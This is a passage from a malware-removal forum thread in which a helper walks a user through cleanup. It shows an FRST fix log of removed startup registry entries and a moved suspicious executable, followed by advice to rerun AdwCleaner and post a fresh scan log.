HKCR\CLSID\{34A0D84B-CDDC-4EC4-AFDD-4F1DDE1D14E5} => key not found. 
HKLM\Software\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\\1024412975 => value not found.
HKU\S-1-5-21-2520790421-254736193-3744350732-1000\Software\Microsoft\Windows\CurrentVersion\Run\\Browser Extensions => value not found.
HKU\S-1-5-21-2520790421-254736193-3744350732-1000\Software\Microsoft\Windows\CurrentVersion\Run\\Settings Manager => value removed successfully
HKU\S-1-5-21-2520790421-254736193-3744350732-1000\Software\Microsoft\Windows\CurrentVersion\Run\\{33D7074C-563D-4D69-875F-595D51FBE7FC} => value removed successfully
HKU\S-1-5-21-2520790421-254736193-3744350732-1000\Software\Microsoft\Windows\CurrentVersion\Run\\UM => value removed successfully
EmptyTemp: => 399.2 MB temporary data Removed.
 
Result of scheduled files to move (Boot Mode: Normal) (Date&Time: 2015-11-16 08:36:56)
 
C:\ProgramData\mscmcnfo.exe => Is moved successfully
C:\ProgramData\mscmcnfo.exe => Is moved successfully
 
==== End of Fixlog 08:36:56 ====

Edited by Marnel, 15 November 2015 - 07:40 PM.


#5 shelf life

shelf life

  • Malware Response Team
  • 2,688 posts
  • Gender:Male
  • Location:@localhost

Posted 15 November 2015 - 07:47 PM

OK. Good. Rerun AdwCleaner like you did before, and after the scan is done click the cleaning button. Machine will reboot to finish the removal process.




#6 shelf life

shelf life

  • Malware Response Team
  • 2,688 posts
  • Gender:Male
  • Location:@localhost

Posted 17 November 2015 - 05:48 PM

You have it all under control?




#7 Marnel

Marnel
  • Topic Starter
  • Members
  • 52 posts
  • Gender:Male
  • Location:Philippines

Posted 17 November 2015 - 08:57 PM

There are so many processes running on my computer. I don't know these processes, but my RAM and CPU usage spike to 70-95%.



#8 shelf life

shelf life

  • Malware Response Team
  • 2,688 posts
  • Gender:Male
  • Location:@localhost

Posted 18 November 2015 - 05:16 PM

OK, so you ran AdwCleaner again and after the scan clicked the cleaning button?

Rescan with FRST and post a new FRST log also.






